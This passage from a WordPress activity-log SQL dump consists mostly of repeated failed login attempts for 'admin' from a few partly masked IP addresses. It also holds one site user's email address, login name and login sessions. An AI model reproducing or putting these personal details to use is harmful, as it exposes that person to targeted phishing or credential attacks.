232.6.x'),(238855,40581,'failed_username','admin'),(238856,40581,'server_http_user_agent','Mozilla/5.0'),(238857,40581,'_message_key','user_unknown_login_failed'),(238858,40581,'_server_remote_addr','20.38.46.x'),(238859,40582,'failed_username','admin'),(238860,40582,'server_http_user_agent','Mozilla/5.0'),(238861,40582,'_message_key','user_unknown_login_failed'),(238862,40582,'_server_remote_addr','52.232.6.x'),(238863,40583,'failed_username','admin'),(238864,40583,'server_http_user_agent','Mozilla/5.0'),(238865,40583,'_message_key','user_unknown_login_failed'),(238866,40583,'_server_remote_addr','20.38.46.x'),(238867,40584,'failed_username','admin'),(238868,40584,'server_http_user_agent','Mozilla/5.0'),(238869,40584,'_message_key','user_unknown_login_failed'),(238870,40584,'_server_remote_addr','52.232.6.x'),(238871,40585,'failed_username','admin'),(238872,40585,'server_http_user_agent','Mozilla/5.0'),(238873,40585,'_message_key','user_unknown_login_failed'),(238874,40585,'_server_remote_addr','20.38.46.x'),(238875,40586,'failed_username','admin'),(238876,40586,'server_http_user_agent','Mozilla/5.0'),(238877,40586,'_message_key','user_unknown_login_failed'),(238878,40586,'_server_remote_addr','52.232.6.x'),(238879,40587,'failed_username','admin'),(238880,40587,'server_http_user_agent','Mozilla/5.0'),(238881,40587,'_message_key','user_unknown_login_failed'),(238882,40587,'_server_remote_addr','20.38.46.x'),(238883,40588,'failed_username','admin'),(238884,40588,'server_http_user_agent','Mozilla/5.0'),(238885,40588,'_message_key','user_unknown_login_failed'),(238886,40588,'_server_remote_addr','20.38.46.x'),(238887,40589,'failed_username','admin'),(238888,40589,'server_http_user_agent','Mozilla/5.0'),(238889,40589,'_message_key','user_unknown_login_failed'),(238890,40589,'_server_remote_addr','52.232.6.x'),(238891,40590,'user_id','2'),(238892,40590,'user_email','nada@zipnadanot.org'),(238893,40590,'user_login','S8zhaBda'),(238894,40590,'_user_id','2'),(238895,40590,'_user_login','S8zhaBda'),(238896,40590,'_user_email','nada@zipnadanot.org'),(238897,40590,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(238898,40590,'_message_key','user_logged_in'),(238899,40590,'_server_remote_addr','76.130.120.x'),(238900,40590,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(238901,40591,'failed_username','admin'),(238902,40591,'server_http_user_agent','Mozilla/5.0'),(238903,40591,'_message_key','user_unknown_login_failed'),(238904,40591,'_server_remote_addr','20.38.46.x'),(238905,40592,'failed_username','admin'),(238906,40592,'server_http_user_agent','Mozilla/5.0'),(238907,40592,'_message_key','user_unknown_login_failed'),(238908,40592,'_server_remote_addr','52.232.6.x'),(238909,40593,'failed_username','admin'),(238910,40593,'server_http_user_agent','Mozilla/5.0'),(238911,40593,'_message_key','user_unknown_login_failed'),(238912,40593,'_server_remote_addr','20.38.46.x'),(238913,40594,'failed_username','admin'),(238914,40594,'server_http_user_agent','Mozilla/5.0'),(238915,40594,'_message_key','user_unknown_login_failed'),(238916,40594,'_server_remote_addr','52.232.6.x'),(238917,40595,'failed_username','admin'),(238918,40595,'server_http_user_agent','Mozilla/5.0'),(238919,40595,'_message_key','user_unknown_login_failed'),(238920,40595,'_server_remote_addr','20.38.46.x'),(238921,40596,'failed_username','admin'),(238922,40596,'server_http_user_agent','Mozilla/5.0'),(238923,40596,'_message_key','user_unknown_login_failed'),(238924,40596,'_server_remote_addr','52.232.6.x'),(238925,40597,'failed_username','admin'),(238926,40597,'server_http_user_agent','Mozilla/5.0'),(238927,40597,'_message_key','user_unknown_login_failed'),(238928,40597,'_server_remote_addr','20.38.46.x'),(238929,40598,'failed_username','admin'),(238930,40598,'server_http_user_agent','Mozilla/5.0'),(238931,40598,'_message_key','user_unknown_login_failed'),(238932,40598,'_server_remote_addr','52.232.6.x'),(238933,40599,'failed_username','admin'),(238934,40599,'server_http_user_agent','Mozilla/5.0'),(238935,40599,'_message_key','user_unknown_login_failed'),(238936,40599,'_server_remote_addr','20.38.46.x'),(238937,40600,'failed_username','admin'),(238938,40600,'server_http_user_agent','Mozilla/5.0'),(238939,40600,'_message_key','user_unknown_login_failed'),(238940,40600,'_server_remote_addr','52.232.6.x'),(238941,40601,'failed_username','admin'),(238942,40601,'server_http_user_agent','Mozilla/5.0'),(238943,40601,'_message_key','user_unknown_login_failed'),(238944,40601,'_server_remote_addr','20.38.46.x'),(238945,40602,'failed_username','admin'),(238946,40602,'server_http_user_agent','Mozilla/5.0'),(238947,40602,'_message_key','user_unknown_login_failed'),(238948,40602,'_server_remote_addr','20.38.46.x'),(238949,40603,'failed_username','admin'),(238950,40603,'server_http_user_agent','Mozilla/5.0'),(238951,40603,'_message_key','user_unknown_login_failed'),(238952,40603,'_server_remote_addr','52.232.6.x'),(238953,40604,'failed_username','admin'),(238954,40604,'server_http_user_agent','Mozilla/5.0'),(238955,40604,'_message_key','user_unknown_login_failed'),(238956,40604,'_server_remote_addr','20.38.46.x'),(238957,40605,'failed_username','admin'),(238958,40605,'server_http_user_agent','Mozilla/5.0'),(238959,40605,'_message_key','user_unknown_login_failed'),(238960,40605,'_server_remote_addr','52.232.6.x'),(238961,40606,'failed_username','admin'),(238962,40606,'server_http_user_agent','Mozilla/5.0'),(238963,40606,'_message_key','user_unknown_login_failed'),(238964,40606,'_server_remote_addr','20.38.46.x'),(238965,40607,'failed_username','admin'),(238966,40607,'server_http_user_agent','Mozilla/5.0'),(238967,40607,'_message_key','user_unknown_login_failed'),(238968,40607,'_server_remote_addr','52.232.6.x'),(238969,40608,'failed_username','admin'),(238970,40608,'server_http_user_agent','Mozilla/5.0'),(238971,40608,'_message_key','user_unknown_login_failed'),(238972,40608,'_server_remote_addr','20.38.46.x'),(238973,40609,'failed_username','admin'),(238974,40609,'server_http_user_agent','Mozilla/5.0'),(238975,40609,'_message_key','user_unknown_login_failed'),(238976,40609,'_server_remote_addr','52.232.6.x'),(238977,40610,'failed_username','admin'),(238978,40610,'server_http_user_agent','Mozilla/5.0'),(238979,40610,'_message_key','user_unknown_login_failed'),(238980,40610,'_server_remote_addr','20.38.46.x'),(238981,40611,'failed_username','admin'),(238982,40611,'server_http_user_agent','Mozilla/5.0'),(238983,40611,'_message_key','user_unknown_login_failed'),(238984,40611,'_server_remote_addr','52.232.6.x'),(238985,40612,'failed_username','admin'),(238986,40612,'server_http_user_agent','Mozilla/5.0'),(238987,40612,'_message_key','user_unknown_login_failed'),(238988,40612,'_server_remote_addr','20.38.46.x'),(238989,40613,'failed_username','admin'),(238990,40613,'server_http_user_agent','Mozilla/5.0'),(238991,40613,'_message_key','user_unknown_login_failed'),(238992,40613,'_server_remote_addr','52.232.6.x'),(238993,40614,'failed_username','admin'),(238994,40614,'server_http_user_agent','Mozilla/5.0'),(238995,40614,'_message_key','user_unknown_login_failed'),(238996,40614,'_server_remote_addr','20.38.46.x'),(238997,40615,'_user_id','2'),(238998,40615,'_user_login','S8zhaBda'),(238999,40615,'_user_email','nada@zipnadanot.org'),(239000,40615,'_message_key','user_logged_out'),(239001,40615,'_server_remote_addr','76.130.120.x'),(239002,40615,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=page'),(239003,40616,'failed_username','admin'),(239004,40616,'server_http_user_agent','Mozilla/5.0'),(239005,40616,'_message_key','user_unknown_login_failed'),(239006,40616,'_server_remote_addr','52.232.6.x'),(239007,40617,'failed_username','admin'),(239008,40617,'server_http_user_agent','Mozilla/5.0'),(239009,40617,'_message_key','user_unknown_login_failed'),(239010,40617,'_server_remote_addr','20.38.46.x'),(239011,40618,'failed_username','admin'),(239012,40618,'server_http_user_agent','Mozilla/5.0'),(239013,40618,'_message_key','user_unknown_login_failed'),(239014,40618,'_server_remote_addr','104.225.143.x'),(239015,40619,'failed_username','admin'),(239016,40619,'server_http_user_agent','Mozilla/5.0'),(239017,40619,'_message_key','user_unknown_login_failed'),(239018,40619,'_server_remote_addr','20.38.46.x'),(239019,40620,'failed_username','admin'),(239020,40620,'server_http_user_agent','Mozilla/5.0'),(239021,40620,'_message_key','user_unknown_login_failed'),(239022,40620,'_server_remote_addr','52.232.6.x'),(239023,40621,'failed_username','admin'),(239024,40621,'server_http_user_agent','Mozilla/5.0'),(239025,40621,'_message_key','user_unknown_login_failed'),(239026,40621,'_server_remote_addr','20.38.46.x'),(239027,40622,'failed_username','admin'),(239028,40622,'server_http_user_agent','Mozilla/5.0'),(239029,40622,'_message_key','user_unknown_login_failed'),(239030,40622,'_server_remote_addr','52.232.6.x'),(239031,40623,'failed_username','admin'),(239032,40623,'server_http_user_agent','Mozilla/5.0'),(239033,40623,'_message_key','user_unknown_login_failed'),(239034,40623,'_server_remote_addr','20.38.46.x'),(239035,40624,'failed_username','admin'),(239036,40624,'server_http_user_agent','Mozilla/5.0'),(239037,40624,'_message_key','user_unknown_login_failed'),(239038,40624,'_server_remote_addr','52.232.6.x'),(239039,40625,'failed_username','admin'),(239040,40625,'server_http_user_agent','Mozilla/5.0'),(239041,40625,'_message_key','user_unknown_login_failed'),(239042,40625,'_server_remote_addr','104.225.143.x'),(239043,40626,'failed_username','admin'),(239044,40626,'server_http_user_agent','Mozilla/5.0'),(239045,40626,'_message_key','user_unknown_login_failed'),(239046,40626,'_server_remote_addr','20.38.46.x'),(239047,40627,'failed_username','admin'),(239048,40627,'server_http_user_agent','Mozilla/5.0'),(239049,40627,'_message_key','user_unknown_login_failed'),(239050,40627,'_server_remote_addr','52.232.6.x'),(239051,40628,'failed_username','admin'),(239052,40628,'server_http_user_agent','Mozilla/5.0'),(239053,40628,'_message_key','user_unknown_login_failed'),(239054,40628,'_server_remote_addr','20.38.46.x'),(239055,40629,'failed_username','admin'),(239056,40629,'server_http_user_agent','Mozilla/5.0'),(239057,40629,'_message_key','user_unknown_login_failed'),(239058,40629,'_server_remote_addr','52.232.6.x'),(239059,40630,'failed_username','admin'),(239060,40630,'server_http_user_agent','Mozilla/5.0'),(239061,40630,'_message_key','user_unknown_login_failed'),(239062,40630,'_server_remote_addr','20.38.46.x'),(239063,40631,'failed_username','admin'),(239064,40631,'server_http_user_agent','Mozilla/5.0'),(239065,40631,'_message_key','user_unknown_login_failed'),(239066,40631,'_server_remote_addr','104.225.143.x'),(239067,40632,'failed_username','admin'),(239068,40632,'server_http_user_agent','Mozilla/5.0'),(239069,40632,'_message_key','user_unknown_login_failed'),(239070,40632,'_server_remote_addr','52.232.6.x'),(239071,40633,'failed_username','admin'),(239072,40633,'server_http_user_agent','Mozilla/5.0'),(239073,40633,'_message_key','user_unknown_login_failed'),(239074,40633,'_server_remote_addr','20.38.46.x'),(239075,40634,'failed_username','admin'),(239076,40634,'server_http_user_agent','Mozilla/5.0'),(239077,40634,'_message_key','user_unknown_login_failed'),(239078,40634,'_server_remote_addr','20.38.46.x'),(239079,40635,'failed_username','admin'),(239080,40635,'server_http_user_agent','Mozilla/5.0'),(239081,40635,'_message_key','user_unknown_login_failed'),(239082,40635,'_server_remote_addr','52.232.6.x'),(239083,40636,'failed_username','admin'),(239084,40636,'server_http_user_agent','Mozilla/5.0'),(239085,40636,'_message_key','user_unknown_login_failed'),(239086,40636,'_server_remote_addr','104.225.143.x'),(239087,40637,'failed_username','admin'),(239088,40637,'server_http_user_agent','Mozilla/5.0'),(239089,40637,'_message_key','user_unknown_login_failed'),(239090,40637,'_server_remote_addr','20.38.46.x'),(239091,40638,'failed_username','admin'),(239092,40638,'server_http_user_agent','Mozilla/5.0'),(239093,40638,'_message_key','user_unknown_login_failed'),(239094,40638,'_server_remote_addr','52.232.6.x'),(239095,40639,'failed_username','admin'),(239096,40639,'server_http_user_agent','Mozilla/5.0'),(239097,40639,'_message_key','user_unknown_login_failed'),(239098,40639,'_server_remote_addr','20.38.46.x'),(239099,40640,'failed_username','admin'),(239100,40640,'server_http_user_agent','Mozilla/5.0'),(239101,40640,'_message_key','user_unknown_login_failed'),(239102,40640,'_server_remote_addr','52.232.6.x'),(239103,40641,'failed_username','admin'),(239104,40641,'server_http_user_agent','Mozilla/5.0'),(239105,40641,'_message_key','user_unknown_login_failed'),(239106,40641,'_server_remote_addr','20.38.46.x'),(239107,40642,'failed_username','admin'),(239108,40642,'server_http_user_agent','Mozilla/5.0'),(239109,40642,'_message_key','user_unknown_login_failed'),(239110,40642,'_server_remote_addr','104.225.143.x'),(239111,40643,'failed_username','administrator'),(239112,40643,'server_http_user_agent','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(239113,40643,'_message_key','user_unknown_login_failed'),(239114,40643,'_server_remote_addr','198.98.49.x'),(239115,40644,'failed_username','admin'),(239116,40644,'server_http_user_agent','Mozilla/5.0'),(239117,40644,'_message_key','user_unknown_login_failed'),(239118,40644,'_server_remote_addr','52.232.6.x'),(239119,40645,'failed_username','admin'),(239120,40645,'server_http_user_agent','Mozilla/5.0'),(239121,40645,'_message_key','user_unknown_login_failed'),(239122,40645,'_server_remote_addr','20.38.46.x'),(239123,40646,'failed_username','admin'),(239124,40646,'server_http_user_agent','Mozilla/5.0'),(239125,40646,'_message_key','user_unknown_login_failed'),(239126,40646,'_server_remote_addr','52.232.6.x'),(239127,40647,'failed_username','admin'),(239128,40647,'server_http_user_agent','Mozilla/5.0'),(239129,40647,'_message_key','user_unknown_login_failed'),(239130,40647,'_server_remote_addr','20.38.46.x'),(239131,40648,'failed_username','admin'),(239132,40648,'server_http_user_agent','Mozilla/5.0'),(239133,40648,'_message_key','user_unknown_login_failed'),(239134,40648,'_server_remote_addr','104.225.143.x'),(239135,40649,'failed_username','admin'),(239136,40649,'server_http_user_agent','Mozilla/5.0'),(239137,40649,'_message_key','user_unknown_login_failed'),(239138,40649,'_server_remote_addr','52.232.6.x'),(239139,40650,'failed_username','admin'),(239140,40650,'server_http_user_agent','Mozilla/5.0'),(239141,40650,'_message_key','user_unknown_login_failed'),(239142,40650,'_server_remote_addr','20.38.46.x'),(239143,40651,'failed_username','admin'),(239144,40651,'server_http_user_agent','Mozilla/5.0'),(239145,40651,'_message_key','user_unknown_login_failed'),(239146,40651,'_server_remote_addr','52.232.6.x'),(239147,40652,'failed_username','admin'),(239148,40652,'server_http_user_agent','Mozilla/5.0'),(239149,40652,'_message_key','user_unknown_login_failed'),(239150,40652,'_server_remote_addr','20.38.46.x'),(239151,40653,'failed_username','admin'),(239152,40653,'server_http_user_agent','Mozilla/5.0'),(239153,40653,'_message_key','user_unknown_login_failed'),(239154,40653,'_server_remote_addr','20.38.46.x'),(239155,40654,'failed_username','admin'),(239156,40654,'server_http_user_agent','Mozilla/5.0'),(239157,40654,'_message_key','user_unknown_login_failed'),(239158,40654,'_server_remote_addr','52.232.6.x'),(239159,40655,'failed_username','admin'),(239160,40655,'server_http_user_agent','Mozilla/5.0'),(239161,40655,'_message_key','user_unknown_login_failed'),(239162,40655,'_server_remote_addr','104.225.143.x'),(239163,40656,'failed_username','admin'),(239164,40656,'server_http_user_agent','Mozilla/5.0'),(239165,40656,'_message_key','user_unknown_login_failed'),(239166,40656,'_server_remote_addr','20.38.46.x'),(239167,40657,'failed_username','admin'),(239168,40657,'server_http_user_agent','Mozilla/5.0'),(239169,40657,'_message_key','user_unknown_login_failed'),(239170,40657,'_server_remote_addr','52.232.6.x'),(239171,40658,'failed_username','admin'),(239172,40658,'server_http_user_agent','Mozilla/5.0'),(239173,40658,'_message_key','user_unknown_login_failed'),(239174,40658,'_server_remote_addr','20.38.46.x'),(239175,40659,'failed_username','admin'),(239176,40659,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),(239177,40659,'_message_key','user_unknown_login_failed'),(239178,40659,'_server_remote_addr','107.189.29.x'),(239179,40660,'failed_username','admin'),(239180,40660,'server_http_user_agent','Mozilla/5.0'),(239181,40660,'_message_key','user_unknown_login_failed'),(239182,40660,'_server_remote_addr','52.232.6.x'),(239183,40661,'failed_username','admin'),(239184,40661,'server_http_user_agent','Mozilla/5.0'),(239185,40661,'_message_key','user_unknown_login_failed'),(239186,40661,'_server_remote_addr','20.38.46.x'),(239187,40662,'failed_username','admin'),(239188,40662,'server_http_user_agent','Mozilla/5.0'),(239189,40662,'_message_key','user_unknown_login_failed'),(239190,40662,'_server_remote_addr','104.225.143.x'),(239191,40663,'failed_username','admin'),(239192,40663,'server_http_user_agent','Mozilla/5.0'),(239193,40663,'_message_key','user_unknown_login_failed'),(239194,40663,'_server_remote_addr','20.38.46.x'),(239195,40664,'failed_username','admin'),(239196,40664,'server_http_user_agent','Mozilla/5.0'),(239197,40664,'_message_key','user_unknown_login_failed'),(239198,40664,'_server_remote_addr','20.38.46.x'),(239199,40665,'failed_username','admin'),(239200,40665,'server_http_user_agent','Mozilla/5.0'),(239201,40665,'_message_key','user_unknown_login_failed'),(239202,40665,'_server_remote_addr','104.225.143.x'),(239203,40666,'failed_username','admin'),(239204,40666,'server_http_user_agent','Mozilla/5.0'),(239205,40666,'_message_key','user_unknown_login_failed'),(239206,40666,'_server_remote_addr','20.38.46.x'),(239207,40667,'failed_username','admin'),(239208,40667,'server_http_user_agent','Mozilla/5.0'),(239209,40667,'_message_key','user_unknown_login_failed'),(239210,40667,'_server_remote_addr','20.38.46.x'),(239211,40668,'failed_username','admin'),(239212,40668,'server_http_user_agent','Mozilla/5.0'),(239213,40668,'_message_key','user_unknown_login_failed'),(239214,40668,'_server_remote_addr','20.38.46.x'),(239215,40669,'failed_username','admin'),(239216,40669,'server_http_user_agent','Mozilla/5.0'),(239217,40669,'_message_key','user_unknown_login_failed'),(239218,40669,'_server_remote_addr','104.225.143.x'),(239219,40670,'failed_username','admin'),(239220,40670,'server_http_user_agent','Mozilla/5.0'),(239221,40670,'_message_key','user_unknown_login_failed'),(239222,40670,'_server_remote_addr','20.38.46.x'),(239223,40671,'failed_username','admin'),(239224,40671,'server_http_user_agent','Mozilla/5.0'),(239225,40671,'_message_key','user_unknown_login_failed'),(239226,40671,'_server_remote_addr','20.38.46.x'),(239227,40672,'failed_username','admin'),(239228,40672,'server_http_user_agent','Mozilla/5.0'),(239229,40672,'_message_key','user_unknown_login_failed'),(239230,40672,'_server_remote_addr','20.38.46.x'),(239231,40673,'failed_username','admin'),(239232,40673,'server_http_user_agent','Mozilla/5.0'),(239233,40673,'_message_key','user_unknown_login_failed'),(239234,40673,'_server_remote_addr','104.225.143.x'),(239235,40674,'failed_username','admin'),(239236,40674,'server_http_user_agent','Mozilla/5.0'),(239237,40674,'_message_key','user_unknown_login_failed'),(239238,40674,'_server_remote_addr','20.38.46.x'),(239239,40675,'failed_username','admin'),(239240,40675,'server_http_user_agent','Mozilla/5.0'),(239241,40675,'_message_key','user_unknown_login_failed'),(239242,40675,'_server_remote_addr','20.38.46.x'),(239243,40676,'failed_username','admin'),(239244,40676,'server_http_user_agent','Mozilla/5.0'),(239245,40676,'_message_key','user_unknown_login_failed'),(239246,40676,'_server_remote_addr','104.225.143.x'),(239247,40677,'failed_username','admin'),(239248,40677,'server_http_user_agent','Mozilla/5.0'),(239249,40677,'_message_key','user_unknown_login_failed'),(239250,40677,'_server_remote_addr','20.38.46.x'),(239251,40678,'failed_username','admin'),(239252,40678,'server_http_user_agent','Mozilla/5.0'),(239253,40678,'_message_key','user_unknown_login_failed'),(239254,40678,'_server_remote_addr','20.38.46.x'),(239255,40679,'failed_username','admin'),(239256,40679,'server_http_user_agent','Mozilla/5.0'),(239257,40679,'_message_key','user_unknown_login_failed'),(239258,40679,'_server_remote_addr','20.38.46.x'),(239259,40680,'failed_username','admin'),(239260,40680,'server_http_user_agent','Mozilla/5.0'),(239261,40680,'_message_key','user_unknown_login_failed'),(239262,40680,'_server_remote_addr','104.225.143.x'),(239263,40681,'failed_username','admin'),(239264,40681,'server_http_user_agent','Mozilla/5.0'),(239265,40681,'_message_key','user_unknown_login_failed'),(239266,40681,'_server_remote_addr','20.38.46.x'),(239267,40682,'failed_username','admin'),(239268,40682,'server_http_user_agent','Mozilla/5.0'),(239269,40682,'_message_key','user_unknown_login_failed'),(239270,40682,'_server_remote_addr','20.38.46.x'),(239271,40683,'failed_username','admin'),(239272,40683,'server_http_user_agent','Mozilla/5.0'),(239273,40683,'_message_key','user_unknown_login_failed'),(239274,40683,'_server_remote_addr','20.38.46.x'),(239275,40684,'failed_username','admin'),(239276,40684,'server_http_user_agent','Mozilla/5.0'),(239277,40684,'_message_key','user_unknown_login_failed'),(239278,40684,'_server_remote_addr','104.225.143.x'),(239279,40685,'failed_username','admin'),(239280,40685,'server_http_user_agent','Mozilla/5.0'),(239281,40685,'_message_key','user_unknown_login_failed'),(239282,40685,'_server_remote_addr','20.38.46.x'),(239283,40686,'failed_username','admin'),(239284,40686,'server_http_user_agent','Mozilla/5.0'),(239285,40686,'_message_key','user_unknown_login_failed'),(239286,40686,'_server_remote_addr','20.38.46.x'),(239287,40687,'failed_username','admin'),(239288,40687,'server_http_user_agent','Mozilla/5.0'),(239289,40687,'_message_key','user_unknown_login_failed'),(239290,40687,'_server_remote_addr','20.38.46.x'),(239291,40688,'failed_username','admin'),(239292,40688,'server_http_user_agent','Mozilla/5.0'),(239293,40688,'_message_key','user_unknown_login_failed'),(239294,40688,'_server_remote_addr','104.225.143.x'),(239295,40689,'failed_username','admin'),(239296,40689,'server_http_user_agent','Mozilla/5.0'),(239297,40689,'_message_key','user_unknown_login_failed'),(239298,40689,'_server_remote_addr','20.38.46.x'),(239299,40690,'failed_username','admin'),(239300,40690,'server_http_user_agent','Mozilla/5.0'),(239301,40690,'_message_key','user_unknown_login_failed'),(239302,40690,'_server_remote_addr','20.38.46.x'),(239303,40691,'failed_username','admin'),(239304,40691,'server_http_user_agent','Mozilla/5.0'),(239305,40691,'_message_key','user_unknown_login_failed'),(239306,40691,'_server_remote_addr','104.225.143.x'),(239307,40692,'failed_username','admin'),(239308,40692,'server_http_user_agent','Mozilla/5.0'),(239309,40692,'_message_key','user_unknown_login_failed'),(239310,40692,'_server_remote_addr','20.38.46.x'),(239311,40693,'failed_username','admin'),(239312,40693,'server_http_user_agent','Mozilla/5.0'),(239313,40693,'_message_key','user_unknown_login_failed'),(239314,40693,'_server_remote_addr','20.38.46.x'),(239315,40694,'failed_username','admin'),(239316,40694,'server_http_user_agent','Mozilla/5.0'),(239317,40694,'_message_key','user_unknown_login_failed'),(239318,40694,'_server_remote_addr','20.38.46.x'),(239319,40695,'failed_username','admin'),(239320,40695,'server_http_user_agent','Mozilla/5.0'),(239321,40695,'_message_key','user_unknown_login_failed'),(239322,40695,'_server_remote_addr','104.225.143.x'),(239323,40696,'failed_username','admin'),(239324,40696,'server_http_user_agent','Mozilla/5.0'),(239325,40696,'_message_key','user_unknown_login_failed'),(239326,40696,'_server_remote_addr','20.38.46.x'),(239327,40697,'failed_username','admin'),(239328,40697,'server_http_user_agent','Mozilla/5.0'),(239329,40697,'_message_key','user_unknown_login_failed'),(239330,40697,'_server_remote_addr','20.38.46.x'),(239331,40698,'failed_username','admin'),(239332,40698,'server_http_user_agent','Mozilla/5.0'),(239333,40698,'_message_key','user_unknown_login_failed'),(239334,40698,'_server_remote_addr','20.38.46.x'),(239335,40699,'failed_username','admin'),(239336,40699,'server_http_user_agent','Mozilla/5.0'),(239337,40699,'_message_key','user_unknown_login_failed'),(239338,40699,'_server_remote_addr','104.225.143.x'),(239339,40700,'failed_username','admin'),(239340,40700,'server_http_user_agent','Mozilla/5.0'),(239341,40700,'_message_key','user_unknown_login_failed'),(239342,40700,'_server_remote_addr','20.38.46.x'),(239343,40701,'failed_username','admin'),(239344,40701,'server_http_user_agent','Mozilla/5.0'),(239345,40701,'_message_key','user_unknown_login_failed'),(239346,40701,'_server_remote_addr','20.38.46.x'),(239347,40702,'failed_username','admin'),(239348,40702,'server_http_user_agent','Mozilla/5.0'),(239349,40702,'_message_key','user_unknown_login_failed'),(239350,40702,'_server_remote_addr','20.38.46.x'),(239351,40703,'failed_username','admin'),(239352,40703,'server_http_user_agent','Mozilla/5.0'),(239353,40703,'_message_key','user_unknown_login_failed'),(239354,40703,'_server_remote_addr','104.225.143.x'),(239355,40704,'failed_username','admin'),(239356,40704,'server_http_user_agent','Mozilla/5.0'),(239357,40704,'_message_key','user_unknown_login_failed'),(239358,40704,'_server_remote_addr','20.38.46.x'),(239359,40705,'failed_username','admin'),(239360,40705,'server_http_user_agent','Mozilla/5.0'),(239361,40705,'_message_key','user_unknown_login_failed'),(239362,40705,'_server_remote_addr','20.38.46.x'),(239363,40706,'failed_username','admin'),(239364,40706,'server_http_user_agent','Mozilla/5.0'),(239365,40706,'_message_key','user_unknown_login_failed'),(239366,40706,'_server_remote_addr','104.225.143.x'),(239367,40707,'plugin_name','Advanced Google reCAPTCHA'),(239368,40707,'plugin_current_version','1.0.15'),(239369,40707,'plugin_new_version','1.1'),(239370,40707,'_message_key','plugin_update_available'),(239371,40707,'_server_remote_addr','173.231.231.x'),(239372,40708,'failed_username','admin'),(239373,40708,'server_http_user_agent','Mozilla/5.0'),(239374,40708,'_message_key','user_unknown_login_failed'),(239375,40708,'_server_remote_addr','20.38.46.x'),(239376,40709,'failed_username','admin'),(239377,40709,'server_http_user_agent','Mozilla/5.0'),(239378,40709,'_message_key','user_unknown_login_failed'),(239379,40709,'_server_remote_addr','20.38.46.x'),(239380,40710,'failed_username','admin'),(239381,40710,'server_http_user_agent','Mozilla/5.0'),(239382,40710,'_message_key','user_unknown_login_failed'),(239383,40710,'_server_remote_addr','20.38.46.x'),(239384,40711,'failed_username','admin'),(239385,40711,'server_http_user_agent','Mozilla/5.0'),(239386,40711,'_message_key','user_unknown_login_failed'),(239387,40711,'_server_remote_addr','104.225.143.x'),(239388,40712,'failed_username','admin'),(239389,40712,'server_http_user_agent','Mozilla/5.0'),(239390,40712,'_message_key','user_unknown_login_failed'),(239391,40712,'_server_remote_addr','20.38.46.x'),(239392,40713,'failed_username','admin'),(239393,40713,'server_http_user_agent','Mozilla/5.0'),(239394,40713,'_message_key','user_unknown_login_failed'),(239395,40713,'_server_remote_addr','20.38.46.x'),(239396,40714,'failed_username','admin'),(239397,40714,'server_http_user_agent','Mozilla/5.0'),(239398,40714,'_message_key','user_unknown_login_failed'),(239399,40714,'_server_remote_addr','20.38.46.x'),(239400,40715,'failed_username','admin'),(239401,40715,'server_http_user_agent','Mozilla/5.0'),(239402,40715,'_message_key','user_unknown_login_failed'),(239403,40715,'_server_remote_addr','104.225.143.x'),(239404,40716,'failed_username','admin'),(239405,40716,'server_http_user_agent','Mozilla/5.0'),(239406,40716,'_message_key','user_unknown_login_failed'),(239407,40716,'_server_remote_addr','20.38.46.x'),(239408,40717,'failed_username','admin'),(239409,40717,'server_http_user_agent','Mozilla/5.0'),(239410,40717,'_message_key','user_unknown_login_failed'),(239411,40717,'_server_remote_addr','20.38.46.x'),(239412,40718,'failed_username','admin'),(239413,40718,'server_http_user_agent','Mozilla/5.0'),(239414,40718,'_message_key','user_unknown_login_failed'),(239415,40718,'_server_remote_addr','20.38.46.x'),(239416,40719,'failed_username','admin'),(239417,40719,'server_http_user_agent','Mozilla/5.0'),(239418,40719,'_message_key','user_unknown_login_failed'),(239419,40719,'_server_remote_addr','104.225.143.x'),(239420,40720,'failed_username','admin'),(239421,40720,'server_http_user_agent','Mozilla/5.0'),(239422,40720,'_message_key','user_unknown_login_failed'),(239423,40720,'_server_remote_addr','20.38.46.x'),(239424,40721,'failed_username','admin'),(239425,40721,'server_http_user_agent','Mozilla/5.0'),(239426,40721,'_message_key','user_unknown_login_failed'),(239427,40721,'_server_remote_addr','104.225.143.x'),(239428,40722,'failed_username','admin'),(239429,40722,'server_http_user_agent','Mozilla/5.0'),(239430,40722,'_message_key','user_unknown_login_failed'),(239431,40722,'_server_remote_addr','104.225.143.x'),(239432,40723,'failed_username','admin'),(239433,40723,'server_http_user_agent','Mozilla/5.0'),(239434,40723,'_message_key','user_unknown_login_failed'),(239435,40723,'_server_remote_addr','104.225.143.x'),(239436,40724,'plugin_name','Passster'),(239437,40724,'plugin_current_version','4.2.4'),(239438,40724,'plugin_new_version','4.2.5'),(239439,40724,'_message_key','plugin_update_available'),(239440,40724,'_server_remote_addr','173.231.231.x'),(239441,40725,'failed_username','admin'),(239442,40725,'server_http_user_agent','Mozilla/5.0'),(239443,40725,'_message_key','user_unknown_login_failed'),(239444,40725,'_server_remote_addr','104.225.143.x'),(239445,40726,'failed_username','admin'),(239446,40726,'server_http_user_agent','Mozilla/5.0'),(239447,40726,'_message_key','user_unknown_login_failed'),(239448,40726,'_server_remote_addr','104.225.143.x'),(239449,40727,'failed_username','admin'),(239450,40727,'server_http_user_agent','Mozilla/5.0'),(239451,40727,'_message_key','user_unknown_login_failed'),(239452,40727,'_server_remote_addr','104.225.143.x'),(239453,40728,'failed_username','admin'),(239454,40728,'server_http_user_agent','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 